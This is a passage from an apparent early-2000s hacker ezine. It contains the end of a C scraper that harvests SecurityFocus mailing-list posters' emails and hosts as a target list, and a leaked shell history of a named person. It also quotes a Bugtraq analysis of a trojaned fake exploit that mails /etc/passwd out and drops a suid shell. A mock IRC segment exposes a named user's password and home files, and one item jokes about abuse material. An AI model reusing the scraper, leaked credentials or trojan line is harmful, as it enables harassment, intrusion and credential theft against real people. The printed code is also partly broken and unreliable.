{"cisspstudy [inspired by dr. crispin cowin]",
"GET http://online.securityfocus.com/archive/99"},
{"focus-ids [cant sekure a b0x so they use ids]",
"GET http://online.securityfocus.com/archive/96"},
{"choose this if u have linux 0day",
"GET http://online.securityfocus.com/archive/91"},
{"choose this if u have win32 0day",
"GET http://online.securityfocus.com/archive/88"},
{"choose this if u have solaris 0day",
"GET http://online.securityfocus.com/archive/92"},
{"scan here for bo2k",
"GET http://online.securityfocus.com/archive/100"},
{"forensics (prolly not worth it, they r already 0wned)",
"GET http://online.securityfocus.com/archive/104"},
{"honeynet [leave burneye encrypted kopiez"
" of nmap 4 lance sp1tzner here]",
"GET http://online.securityfocus.com/archive/119"},
{"incidents [see how well pr0ject m4yh3m is d0ing",
"GET http://online.securityfocus.com/archive/75"},
{"pen-test [people like s1 here hehe]",
"GET http://online.securityfocus.com/archive/101"},
{"sec-papers [4 the literary inkl1n3d like warzael zarcae",
"GET http://online.securityfocus.com/archive/112"},
{"security-basics PAHAHAHAHAHA n3wb13z ripe 4 the picking",
"GET http://online.securityfocus.com/archive/105"},
/* NOTE(review): the url literal of the next entry is split across two
 * physical lines in this copy (apparently a line wrap of the listing);
 * a C string literal cannot contain a raw newline, so the table does not
 * compile as printed. */
{"security-certification [l4m3rz who have subskr1b3d"
" 2 security-basics longer than 2 weekz",
"GET http://online.securityfocus.com
/archive/106"},
{
"security-jobs [own theze fuckerz quick, they r desperately"
" trying 2 publish 0day]"
,"GET http://online.securityfocus.com/archive/77"},
{"vpn [hehe launch pptphack here]",
"GET http://online.securityfocus.com/archive/50"},
{"vuln-dev <- th3 m0ther l4m3r sh1p h4z l4nd3d",
"GET http://online.securityfocus.com/archive/82"},
{"choose this if u have shopping kart cgi po1z0n byte warez",
"GET http://online.securityfocus.com/archive/107"}
};
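/*
 * Print the date range encoded in an archive index URL.
 *
 * url: path or URL containing "/archive/1/YYYY-MM-DD/YYYY-MM-DD/".
 *
 * Prints nothing when the "/archive/1/" marker is absent. Otherwise
 * prints "LAMER CHRONOLOGY: " followed by the range as month/day/year,
 * or by the parse-error text when six numbers cannot be read.
 */
void printdates(char *url)
{
    char *ptr;
    int bday, bmonth, byear, eday, emonth, eyear, num;
#define MAGIC "/archive/1/"

    ptr = strstr(url, MAGIC);
    if (ptr == NULL)
        return;

    /*
     * Parse from the marker that strstr() located. The original scanned
     * from the start of url, so any URL with text in front of the marker
     * (a scheme and host, for example) passed the strstr() test and then
     * always failed the parse.
     */
    num = sscanf(ptr, MAGIC "%d-%d-%d/%d-%d-%d/",
                 &byear, &bmonth, &bday, &eyear, &emonth, &eday);

    printf("LAMER CHRONOLOGY: ");
    if (num != 6)
        printf("ERROR IN PARSING BUT WH0 KAREZ\n");
    else
        printf("%d/%d/%d to %d/%d/%d\n",
               bmonth, bday, byear, emonth, eday, eyear);
    fflush(stdout);
}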
/*
 * Build a request line for the given path.
 *
 * end: path to append to PREFIX; a '/' is inserted when it does not
 *      already start with one.
 *
 * Returns a freshly allocated string "PREFIX[/]end\r\n" that the caller
 * must free(). On allocation failure it prints a message, runs
 * "ps -u cr" through system() and exits with status -1.
 */
char *makeurl(char *end)
{
    /* Separator is empty when the path already begins with a slash. */
    const char *sep = (*end != '/') ? "/" : "";
    /* +4 = optional '/', the two CRLF bytes, and the terminating NUL. */
    int total = strlen(PREFIX) + strlen(end) + 4;
    char *request = calloc(1, total);

    if (request == NULL) {
        fprintf(stderr, "hmm out 0f memory... might be 4 f0rq b0mb!\n");
        system("ps -u cr");
        exit(-1);
    }

    strcpy(request, PREFIX);
    strcat(request, sep);
    strcat(request, end);
    strcat(request, "\r\n");
    return request;
}
/*
 * Write a request line to fd, followed by a line terminator.
 *
 * fd:  descriptor to write to.
 * cmd: NUL-terminated request text.
 *
 * Only the first two bytes of the "\r\n\r\n" literal are written, so a
 * single CRLF follows cmd. The results of write() are not checked, so a
 * short or failed write goes unnoticed.
 */
void sendcmd(int fd, char *cmd)
{
    static const char terminator[] = "\r\n\r\n";
    size_t cmdlen = strlen(cmd);

    write(fd, cmd, cmdlen);
    write(fd, terminator, 2);
}
/*
 * Open a TCP connection to the address stored in the global sinz.
 *
 * Returns the connected socket descriptor. Does not return on failure:
 * it prints a message to stderr and exits with status -1. When socket()
 * fails it first passes a command line to system(); the unescaped '|'
 * characters in that string are shell pipes, so the names after them are
 * run as commands rather than used as egrep alternatives.
 */
int connecthost(void)
{
    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (sock < 0) {
        fprintf(stderr, "out of socketz... weird\n");
        system("ps aux|egrep tron|mixter|felix");
        exit(-1);
    }

    if (connect(sock, (struct sockaddr *)&sinz, sizeof(sinz)) >= 0)
        return sock;

    fprintf(stderr,
            "cant connect to online.securityfocus.com...project mayhem successfully accomplished!\n");
    exit(-1);
}
/*
 * fgets-like line reader for a descriptor.
 *
 * Reads one byte at a time into a static 8192-byte buffer and returns it
 * as soon as a '\r' or '\n' has been stored (the terminator is kept), or
 * when the buffer is full. Returns NULL when read() does not deliver a
 * byte; bytes collected for the current line are then dropped.
 *
 * The buffer is static: every call overwrites the previous line, so the
 * result must be consumed or copied before the next call on any fd.
 *
 * After a terminator the next byte is peeked with MSG_PEEK but nothing is
 * consumed, so the '\n' of a "\r\n" pair comes back as a line of its own
 * on the next call.
 */
char *readline(int fd)
{
    static char buf[8192];
    char ch;
    int pos;

    memset(buf, 0, sizeof(buf));
    pos = 0;
    while (pos < sizeof(buf) - 1) {
        if (read(fd, &ch, 1) != 1)
            return NULL;
        buf[pos] = ch;
        if (ch == '\r' || ch == '\n') {
            /* Peek only; the result is not used and no byte is removed. */
            recv(fd, &ch, 1, MSG_PEEK);
            return buf;
        }
        pos++;
    }
    return buf;
}
/*
 * Fetch one post page and print what its header rows reveal.
 *
 * name: path of the post, as extracted from an index page by letitrip().
 *
 * Opens its own connection, requests the page, then scans it line by
 * line. A line containing ">Message-ID:<" yields the host part after the
 * '@' (printed as "LAMER BOX"); otherwise a line containing ">Author:<"
 * yields the mailto: address and the link text (printed as "LAMER").
 * The line buffer returned by readline() is modified in place.
 *
 * NOTE(review): every printed field is copied from the server response
 * without filtering, so whatever bytes the page holds reach the terminal.
 */
void checkpost(char *name)
{
int fd=connecthost();
char *l,*req,*ptr,*startemail,*startname,*startbox;
/*YO*///printf("DEBUG: CHECKING POST\n");
/* name is copied into req here, before readline() reuses the static
 * buffer that name may point into. */
req=makeurl(name);
sendcmd(fd,req);
free(req);
l=readline(fd);
while(l!=NULL){
ptr=strstr(l,">Message-ID:<");
if(ptr==NULL) goto checkauthor;
/* 13 is the length of the marker matched above. */
ptr+=13;
/* Step past two more '>' characters, then look for the '@'. */
ptr=strchr(ptr,'>');
if(ptr==NULL) goto checkauthor;
ptr++;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto checkauthor;
while(*ptr&&*ptr!='@')
ptr++;
if(!*ptr) goto checkauthor;
ptr++;
startbox=ptr;
/* Host name: the run of alphanumerics and dots after the '@'.
 * NOTE(review): *ptr is a plain char read from the network; passing a
 * negative value to isalnum() is undefined behaviour. */
while(*ptr&&(isalnum(*ptr)||*ptr=='.'))
ptr++;
/* A host that runs to the end of the line is discarded. */
if(!*ptr) goto checkauthor;
*ptr=0;
/* sanity check: only print something that contains a dot */
if(strchr(startbox,'.')==NULL) goto heh;
printf("\t\tLAMER BOX: %s\n",startbox);
goto heh;
checkauthor:
ptr=strstr(l,">Author:<");
if(ptr==NULL) goto heh;
/* NOTE(review): the marker is 9 characters long but 10 are skipped; if
 * the line ends right after the marker this steps past its terminating
 * NUL. */
ptr+=10;
ptr=strstr(ptr,"mailto:");
if(ptr==NULL) goto heh;
ptr+=7;
/* Address: from after "mailto:" up to the closing double quote. */
startemail=ptr;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
*ptr++=0;
/* Display name: the text between the next '>' and the following '<'. */
ptr=strchr(ptr,'>');
if(ptr==NULL) goto heh;
startname=++ptr;
ptr=strchr(ptr,'<');
if(ptr==NULL) goto heh;
*ptr=0;
printf("\tLAMER: %s",startemail);
if(strlen(startname))
printf(" (%s)",startname);
printf("\n");
fflush(stdout);
heh:
l=readline(fd);
}
close(fd);
}
/*
 * Walk one archive index page that has already been requested on fd.
 *
 * For every line that holds a post link (an href inside a cell starting
 * with SEKRETKEY, and not a "threads" link) it calls checkpost() on the
 * link. It also remembers the first link whose text contains "prev Week".
 *
 * Returns a strdup()ed copy of that link, or NULL when none was found;
 * the caller frees it.
 *
 * The line buffer returned by readline() is modified in place. checkpost()
 * calls readline() itself, which overwrites that same static buffer; this
 * function does not touch l again until it has re-read it at heh.
 */
char *letitrip(int fd)
{
char *l=readline(fd);
char *ptr,*start=NULL,*nexturl=NULL,*lamerpost;
while(l!=NULL){
/*YO*///printf("line = %s\n",l);
/* try posts first */
#define SEKRETKEY "<td><div style="
ptr=strstr(l,SEKRETKEY);
if(ptr==NULL) goto nexttest;
ptr+=strlen(SEKRETKEY);
ptr=strchr(ptr,'>');
if(ptr==NULL) goto nexttest;
ptr=strstr(ptr,"href");
if(ptr==NULL) goto nexttest;
ptr+=4;
/* NOTE(review): *ptr is a plain char read from the network; passing a
 * negative value to isspace() is undefined behaviour. */
while (isspace(*ptr))ptr++;
if(*ptr!='=') goto nexttest;
/* The link target is the text between the next pair of double quotes. */
ptr=strchr(ptr,'"');
if(ptr==NULL) goto nexttest;
ptr++;
lamerpost=ptr;
while (*ptr&&*ptr!='"')ptr++;
if(*ptr!='"') goto nexttest;
*ptr=0;
/* two URLs per topic, do not pick the wrong one */
if(strstr(lamerpost,"threads")) goto nexttest;
checkpost(lamerpost);
goto heh;
nexttest:
/* or is it the previous-week link */
ptr=strstr(l,"<a href=");
if(ptr==NULL) goto heh;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
ptr++;
start=ptr;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
*ptr++=0;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto heh;
ptr++;
if(strstr(ptr,"prev Week")==NULL) goto heh;
/* start now holds the previous-week link; keep only the first one.
 * NOTE(review): the strdup() result is not checked; a NULL here simply
 * looks like "no previous week" to the caller. */
if(nexturl==NULL)
nexturl=strdup(start);
heh:
l=readline(fd);
}
return nexturl;
}
/*
 * Entry point.
 *
 * With "-h" or more than one argument: prints the usage text and the
 * numbered category list from targets[] and exits with status 0.
 * With one argument: uses it as an index into targets[].
 * With no argument: starts from BASE_CMD.
 *
 * It then resolves the server name, requests the starting index page and
 * keeps following the "prev Week" link returned by letitrip() until a
 * page has none. Results go to stdout, banners and errors to stderr.
 */
int main (int argc,char **argv)
{
struct hostent *he;
int fd;
char *newurl,*startpoint;
if((argc>2)||((argc==2)&&(!strcmp(argv[1],"-h")))){
int i;
/* NOTE(review): the format string below is split across two physical
 * lines in this copy (apparently a line wrap of the listing); a C string
 * literal cannot contain a raw newline, so this statement does not
 * compile as printed. */
fprintf(stderr,
"l4m3rl1zt3r usage: %s <#>\nwhere # is a l4m3r k4t3g0ry,
defaultz 2 bugtraq\n\n",argv[0]);
fprintf(stderr,"l4m3r k4t3g0r1ez:\n");
fprintf(stderr,"-----------------\n");
for(i=0;i<sizeof(targets)/sizeof(struct target);i++)
fprintf(stderr,"%d\t%s\n",i,targets[i].lamercode);
exit(0);
}
if(argc==2){
/* atoi() reports no errors: a non-numeric argument becomes 0 and so
 * selects the first table entry. */
int choice=atoi(argv[1]);
/* The right-hand side is a size_t, so on typical platforms a negative
 * choice is converted to a large unsigned value and rejected here too. */
if(choice>=(sizeof(targets)/sizeof(struct target))){
fprintf(stderr,"s0rry kouldnt find specif1ed l4m3r...\n");
fprintf(stderr,
"there r many more lam3rz, ~el8 iz working ar0und"
" the cl0q 2 upd8 thiz program with the necessary 2385915 entriez.\n");
fprintf(stderr,"try a valid # tho\n");
exit(-1);
}
startpoint=targets[choice].url;
}
else
startpoint=BASE_CMD;
fprintf(stderr,"l4m3rl1zt3r v1.0\n");
fprintf(stderr,"by uncle m4v1s\n");
fprintf(stderr,"k0pyright (K) 2002 ~el8 research labz\n");
fprintf(stderr,"for help, try -h\n\n");
he = gethostbyname("online.securityfocus.com");
if(he==NULL){
fprintf(stderr,"cant resolve online."
"securityfocus.com...project mayhem successfully accomplished!\n");
exit(-1);
}
/* Fill the global address used by every connecthost() call: port 80 and
 * the first four bytes of the resolved address. */
memset(&sinz,0,sizeof(sinz));
sinz.sin_family=AF_INET;
sinz.sin_port = htons(80);
memcpy(&sinz.sin_addr,he->h_addr,4);
fprintf(stderr,"acquiring t4rget l1zt...!\n");
fprintf(stderr,"begin l4m3r l1st tr4nsm1ss10n!\n");
printf("------------------------------\n");
/* First page: the starting request line is sent as-is. */
fd=connecthost();
sendcmd(fd,startpoint);
printf("LAMER CHRONOLOGY: CURRENT\n");
fflush(stdout);
newurl=letitrip(fd);
close(fd);
if(newurl==NULL){
fprintf(stderr,"weird..some un3xpekt3d sh1t happened!\n");
exit(-1);
}
/* Each pass opens a new connection, requests the previous-week page and
 * replaces newurl with the link found on it; the loop ends when a page
 * yields no such link. */
while(newurl!=NULL)
{
char*req;
fd=connecthost();
req=makeurl(newurl);
sendcmd(fd,req);
printdates(newurl);
free(newurl);
free(req);
newurl=letitrip(fd);
close(fd);
}
printf("-------------------------------------\n");
fprintf(stderr,"we h4v3 d3t3kt3d 4ll p0ss1bl3 l4m3rz!\n");
fprintf(stderr,"n0thing l3ft 2 d0..m4ybe ch3ck #!el8.\n");
fprintf(stderr,"-------------------------------------\n");
return 0;
}
[END_CUT] hitlist.c
.~e~----------------------------------------------------------~e~.
; *08* bronc buster busted -- RLoxley ;
`----------------------------------------------------------------'
Hey guys, this is RLoxley (Robin Hood of Loxley) from hackphreak.org.
I wanted to get my website in your ezine again, and tell everyone how
ethical hacking is the best hacking ever. I have included bronc's
bash history from one of my machines. Also, remember young hackers,
if you break into a system, tell the admin how to patch it, do a good
deed for society. If you hack any child porn people, turn them into
authorities and send all of the downloaded movie/picture evidence to
my personal account: rloxley@hackphreak.org. Stop child porn!
Here it is:
# cat .bash_history
ssh -l bronc 2600.com
ssh -l bronc 2600.com
w
ps aux|grep bronc
kill -9 24409 24424 24428
ps aux|grep bronc
w
telnet localhost
exit
ssh -l bronc 2600.com
w
telnet localhost
exit
w
ping succeed.net
traceroute succeed.net
su bogus
exit
ping succeed.net
w
-su
BitchX bronc irc.freei.net
traceroute succeed.net
w
telnet fingers
exit
su -
exit
ssh 2600.com
exit
vhosts
BitchX bronc -H openGL.3dlinux.com irc.core.com
BitchX
BitchX bronc -H openGL.3dlinux.com
BitchX bronc
ls
ls -l BitchX
whereis BitchX
ls -l /usr/local/bin/BitchX
cd /usr/local/bin
ls
ls -l|more
rm BitchX
su -
cd
BitchX bronc -H openGL.3dlinux.com irc.core.com
ifconfig
vhosts
BitchX bronc -H underpaid.sysadmins.com irc.core.com
exit
su -
exit
su -
exit
su -
exit
su -
exit
w
finger lusta
ps aux|more
ps aux|grep ftp
ftpusers
su -
ls
cd ~ftp
ls
cd pub
ls
ftp fingers
cd
exit
w
clear
exit
w
talk pt
ls
ls -l cygnus-20-full.exe
su -
exit
ifconfig
su -
exit
w
su -
su -
su
w
fingew luat
finger lusta
finger pt
cat /etc/suauth
grep bronc /etc/group
w
su -
grep root /etc/passwd
cat /etc/motfd
cat /etc/motd
cd /var/log
ls
grep su messages|tail
grep su messages|tail - 20
grep su messages|tail 30
grep su messages|tail -30
grep root messages|tail -30
ps aux|grep sendmail
finger pt
ssh fingers
ssh fingers
grep root messages|tail -30
grep root messages|grep su|tail -30
su -
su -
w
uptime
cd /etc
ls -l passwd
id
cd
ls
cd ap
ls
cd ..
ls
w
ssh lemon
ssh lemon
ssh gratefuk
ssh grateful
ssh grateful.org
su bogus
telnet grateful.org
ssh fingers
ssh fingers
exit
su -
more .profile
myvar
hour
myvar=`ifconfig|grep inet| awk -F: '{print $2}'`
su -
exit
man ftp
qcq
pico ftptest
mkdir test
touch test.X
./ftptest
chmod 777 ftptest
ftptest
pico ftptest
ftptest
pico ftptest
ftptest
pico ftptest
ftptest
mv test.X text.X
ftptest
cd test
ls
cat ftptest
cd ..
cat ftptest
rm ftptest
rm -rf test
rm text.X
exit
w
finger lusta
su -
exit
showmount
su -
exit
ssh -l eginorio ssh.cisco.com
ssh -l eginorio bigleague.cisco.com
ssh -l eginorio paullew-ultra.cisco.com
exit
cd /users
cd /home
ls
cd users/
ls
cd ../wheel/
ls
w
finger geoff
finger ficus
deluser
userdel
remuser
su -
exit
ls
ssh attrition.org
ssh 2600.com
exit
ssh 2600.com
exit
ssh 2600.com
w
exit
nslookup phalse.2600.com
nslookup phalse.2600.com
ssh shocking.com
exit
ssh attrition.org
ssh attrition.org
ssh attrition.org
exit
ssh 2600.com
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
xit
eixt
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
sh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh -l eginorio ssh.cisco.com
exit
ssh -l eginorio ssh.cisco.com
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org~
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
exit
ssh attrition.org
exit
pwd
ls
cd lemon/
ls
cd bronc/
ls
cd bb
ks
ls
cd ..
ls -l
cd code
ls
cd ..
ls
pwd
cd ..
ls -l
cd ..
ls -l
cd www
ls
ls l
cd ..
ls -l
cd ap
ls
ls -l
cd ..
cd code
ls
cd ..
ls -l
w
exit
ls
hosts
host
ifconfig -a
/sbin/ifconfig -a
cat /etc/host
cat /etc/hosts
cat /etc/host.conf
netstat -a
w
/sbin/ifconfig -a
nslookup 199.1.199.115
nslookup 199.1.199.114
nslookup 199.1.199.113
xaric --help
xaric -H underpaid.sysadmins.com
w
/sbin/ifconfig -a
nslookup 199.1.199.199
nslookup 199.1.199.122
nslookup 199.1.199.100
xaric -H 3dfxlinux.com
nslookup 199.1.199.101
nslookup 199.1.199.102
nslookup 199.1.199.103
xaric -H asskick.com
traceroute web2.sea.nwserv.com
whois nwserv.com
whois nwserv.com@whois.networksolutions.com
w
exit
ssh attrition.org
exit
ls
cd code/
ls
cd ..
ls
cd lame/
ls
less qpop.c
clear
exit
finger lusta
w
w
ifconfig -a
/usr/sbin/ifconfig 0a
/sbin/ifconfig -a
w
finger jamf
nslookup 209.107.55.2
ftp ftp.bitchx.org
ls
ls -l ircii-pana-75p3.tar.gz
w
host -l vhost.shocking.com
/hostname
hostname
BitchX
w
xaric bronc us.undernet.org
w
w
write jamf
w
w
w
w
w
w
w
write jamf
w
exit
w
w
write jamf
w
ps aux|grep jamf
w
exit
w
exit
w
exit
su-
underpaid
exit
w
exit
passwd
w
ftp localhost
ls
ls
ls
ls
ls -l ENSC.opx
passwd
w
ps aux|grep bronc
kill -9 13856
ls
ftp fingers.shocking.com
exit
w
finger jamf
exit
ls
cd co
cd code
ls
tar -tv ssh-1.2.25.tar.gz
cd ..
ls
cd lemon/
ls
ls -l
cd bronc/
sl
ls
cd code/
ls
cd ..
cd 0day/
l;s
ls
less sshdexp.c
cd
ls
cd ap/
ls
cd
exit
.~e~----------------------------------------------------------~e~.
; *09* lcamtuff helps ~el8 -- lcamtuf ;
`----------------------------------------------------------------'
To: BugTraq
Subject: yet another fake exploit making rounds
Date: Dec 20 2001 8:58PM
Author: Michal Zalewski <lcamtuf@coredump.cx>
Message-ID:
<Pine.LNX.4.42.0112202139180.18953-100000@nimue.bos.bindview.com>
Hello,
Most recent (third) issue of "el8" zine, available at http://el8.8m.com,
among other things claims to have a "0-day" dcron exploit, allegedly
coded by me and Rafal Wojtczuk (Nergal).
/*************************************************************************\
| ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- |
| |
| brought to you by |
| |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
| |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
| |
\*************************************************************************/
[...cut...]
This so-called exploit is already making the rounds, not only in the script
kiddie community, but it is also being run by many admins to test their
boxes. I got reports from several people letting me know "it did not work".
I looked at it, and it appears to be a very nicely crafted trojan horse. It
does send your /etc/passwd file to a fixed address, your-address@mail.com
(the source code suggests this is only a default that the victim can change,
but because of an always-true conditional expression, the user-specified
value is overwritten later; this mailbox is probably valid and attended):
/.../
email_address=(char*)strdup(optarg);
break;
/.../
if(email_address) {
email_address=DEFAULT_EMAIL_ADDRESS;
}
/.../
fprintf(temp,"mail %s < /etc/passwd\n",email_address);
Other than that, this exploit will also create a suid copy of /bin/bash in
/tmp directory, named 'boomsh'. Even if it was not executed as root, it
still gives the attacker an opportunity to escalate privileges locally and
gain access to other accounts, perhaps after guessing at least one
password.
You probably do not want to run this exploit, the same applies to all
other exploits coming from untrusted sources =)
--
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
http://lcamtuf.coredump.cx/photo/
.~e~----------------------------------------------------------~e~.
; *10* lyfestylez of the owned and lamest with jobe -- r0b1nleech;
`----------------------------------------------------------------'
PART ONE:
*** emmanuel'skidsex is now known as r0b1nleech ***
<r0b1nleech> Hello, and welcome to the lyfestylez of the owned and
+ lamest.
<jobe> yoyoyo
<r0b1nleech> Unlike in our previous episode, in which we interviewed
+ pm of sneakerz.org, our next guest, HAS BEEN OWNED (many times).
<jobe> dont do drugs!
<r0b1nleech> Everybody, welcome jobe!! jobe is also a w00w00 affiliate.
<r0b1nleech> Pardon jobe's behaviour, he just did a line of coke and some
+ heroin. Ok, what's this, he's wiggling his arms and flailing his legs.
<r0b1nleech> Oh nevermind he's raving, ok back to the subject at hand.
<jobe> hey everyone i am jobe, also known as, jbowie, or FATALIST OF BoW.
<r0b1nleech> What is your claim to fame?
<jobe> i have shells on numerous hacker boxes, i have been owned many times,
+ and i have been busted for hacking autonet.
<jobe> oh also i have a sparc, i coded a solaris login exploit (THANKS DUKE),
+ and i almost spoke at cansecwest. CULT HERO!
<r0b1nleech> As you can see we have a very skilled individual here.
<jobe> im also famous for w00giving, i wrote a cron exploit (fuck you vix)
<jobe> i also helped shok get laid!
<r0b1nleech> The list keeps going and going :)
<jobe> hey mom, pm, dr, jduck, w00w00, hert, teso, BoW!
<r0b1nleech> Shut the fuck up already or I'll drop your spools.
<jobe> ok.. sorry
<r0b1nleech> We'll be right back after these messages.
PART TWO:
<r0b1nleech> Ok jobe, show us around your hacker network.
<jobe> i would also like to state that dropstatd and udpshell are elite
<jobe> ok fine, lets checkout my HERT homedir first (yo gaius!)
$ ssh -l jobe np9.hert.org
jobe@np9.hert.org's password: abc123hert
! W3lKuM t0 H3Rt HaKr EmErGencY ReSP0nZe Te4M'z NeTw0rK !
! d0nt h4k, 0r h4ck uz, 0r g3t h4ck3d pl3aSe, itS B4D !
$ ls -al
drwxr-x--- 39 jobe jobe 6144 .
drwxr-xr-x 72 root wheel 1536 ..
drwx------ 3 jobe jobe 512 .BitchX
-rw-r--r-- 1 jobe jobe 0 .addressbook
-rw------- 1 jobe jobe 2285 .addressbook.lu
-rw-r--r-- 1 jobe jobe 6353 .bash_history
-rw-r--r-- 1 jobe jobe 667 .bash_profile
-rw-r--r-- 1 jobe jobe 651 .cshrc
drwx------ 2 jobe jobe 512 .gnupg
-rw-r--r-- 1 jobe jobe 255 .login
-rw-r--r-- 1 jobe jobe 160 .login_conf
-rw------- 1 jobe jobe 371 .mail_aliases
-rw-r--r-- 1 jobe jobe 105 .mailrc
-rw------- 1 jobe jobe 301 .mysql_history
-rw-r--r-- 1 jobe jobe 892212 .phoenix.away
-rw------- 1 jobe jobe 8192 .pine-debug1
-rw------- 1 jobe jobe 14247 .pine-debug2
-rw------- 1 jobe jobe 8633 .pine-debug3
-rw------- 1 jobe jobe 7415 .pine-debug4
-rw-r--r-- 1 jobe jobe 11450 .pinerc
-rw-r--r-- 1 jobe jobe 69 .profile
-rw------- 1 jobe jobe 65 .rhosts
-rw-r--r-- 1 jobe jobe 852 .shrc
drwxr-xr-x 2 jobe jobe 512 .ssh
-rw------- 1 jobe jobe 5316 .viminfo
-rw-r--r-- 1 jobe jobe 1003 .vimrc
-rw------- 1 jobe jobe 16384 .w00t;.swp
-rw------- 1 jobe jobe 1198086 2
drwx--x--x 2 jobe jobe 512 3wahas
-rw-r--r-- 1 jobe jobe 8356 3wahas-0.0.1.tar.gz
-rw------- 1 jobe jobe 68 4rkl.sh
-rw-r--r-- 1 jobe jobe 25974 7350854.c
-rw-rw-r-- 1 jobe jobe 29108 ADMmutate-0.8.4.tar.gz
drwxr-xr-x 9 jobe jobe 512 BSD
-rw------- 1 jobe jobe 1527808 BitchX-1.0c18.core
-rw------- 1 jobe jobe 12288 Bowie_Jonathan.doc
-r--r--r-- 1 jobe jobe 116408 CHANGES
-rw-r--r-- 1 jobe jobe 4781 Collector-1.0.tar.gz
-rw------- 1 jobe jobe 24064 Dear Customer.Terracava-Teamdoc.doc
-rw------- 1 jobe jobe 1638716 DiabloHack.exe
-rw-r--r-- 1 jobe jobe 90 FILE_ID.DIZ
drwx------ 3 jobe jobe 512 FreeBSD
-rw-r--r-- 1 jobe jobe 7655 Hunter-1.2.tar.gz
drwxr-xr-x 2 jobe jobe 512 ICMP-Tunnel_P4-1.0
-rw-r--r-- 1 jobe jobe 7011 ICMP-Tunnel_P4-1.0.tar.gz
-rw-rw-r-- 1 jobe jobe 20572160 IDA4.04.tar
-r--r--r-- 1 jobe jobe 4190 INSTALL
-rw-r--r-- 1 jobe jobe 11776 Jonathan_Bowie_Resume.doc
-rw-r--r-- 1 jobe jobe 84854 Lazlov1.01.tar.gz
drwx------ 2 jobe jobe 512 Mail
-rw------- 1 jobe jobe 15098359 Mailbox
-r--r--r-- 1 jobe jobe 26150 Makefile
-rw-r--r-- 1 jobe jobe 3881088 Mushroomhead_-_Born_Of_Desire.mp3
-r--r--r-- 1 jobe jobe 21567 OPTIONS
-rw------- 1 jobe jobe 944 OSDnew.c
-rw------- 1 jobe jobe 990 OSDump.c
-rw------- 1 jobe jobe 1224 OSDump.tar.gz
-rw-r--r-- 1 jobe jobe 1570944 Opie_and_Anthony_-_Steven_Lynch_-_Special_Olympics.mp3
-rw------- 1 jobe jobe 64240 Picture 17.jpg
-rw-r--r-- 1 jobe jobe 2252 README
-rw------- 1 jobe jobe 1056 README.osdump
-rw------- 1 jobe jobe 5326 README2.TXT
-rw------- 1 jobe jobe 7264 SKDoS%s%s%s
-rw-r--r-- 1 jobe jobe 6246 Searcher-8.0.tar.gz
-rw-r--r-- 1 jobe jobe 16744 Smeagol-4.4.4.tar.gz
-rw-r--r-- 1 jobe jobe 1570944 Special_Olympics.mp3
-rw-r--r-- 1 jobe jobe 13547520 System_Of_A_Down.tar
-r--r--r-- 1 jobe jobe 10156 TODO
-rw-r--r-- 1 jobe jobe 2091383 Theyre_Coming_To_Take_Me_Away.mp3
-rw-rw-r-- 1 jobe jobe 1285708 U4CERT1.WAV
-rw-rw-r-- 1 jobe jobe 4077144 U4CERT2.WAV
-rw-r--r-- 1 jobe jobe 2055 UnderDC.txt
-rw-r--r-- 1 jobe jobe 13506560 WildPackets.AiroPeek.v1.0_Win9xNT2K-DOD.tar
-rw------- 1 jobe jobe 63583 WinSCPv0.1b.zip
-rw------- 1 jobe jobe 4712086 anet.tar.gz
-rw------- 1 jobe jobe 52981760 aux88-electro_boogie.tar
-rw-r--r-- 1 jobe jobe 17301 bfx.c
-rwxr-xr-x 2 jobe jobe 512 bin
-rw-r--r-- 1 jobe jobe 477 bind-4.9.6-REL.tar.gz
-rw-r--r-- 1 jobe jobe 2003579 bind-4.9.7-REL.tar.gz
-rw------- 1 jobe jobe 465 blah
-rw------- 1 jobe jobe 23 blah.c
-rw------- 1 jobe jobe 6039 blah.htm
-rw------- 1 jobe jobe 958 blahg
-rw-rw-r-- 1 jobe jobe 12330 bll
-rw-r--r-- 1 jobe jobe 428 blurb
-rw------- 1 jobe jobe 0 boo
-rw-r--r-- 1 jobe jobe 6204 breal_sm.jpg
-rw------- 1 jobe jobe 16701 bud.jpg
-rw-rw-r-- 1 jobe jobe 1998216 c06-snmpv1-req-app-r1.jar
-rw-rw-r-- 1 jobe jobe 18749 c06-snmpv1-req-enc-r1.jar
-rw-r--r-- 1 jobe jobe 27989 cardSelection.pdf
-rw-r--r-- 1 jobe jobe 68997120 carlin.tar
-rw------- 1 jobe jobe 416 cc1.cc
-rw------- 1 jobe jobe 884 cc2.cc
-rw-r--r-- 1 jobe jobe 83690221 cde-src.tar.gz
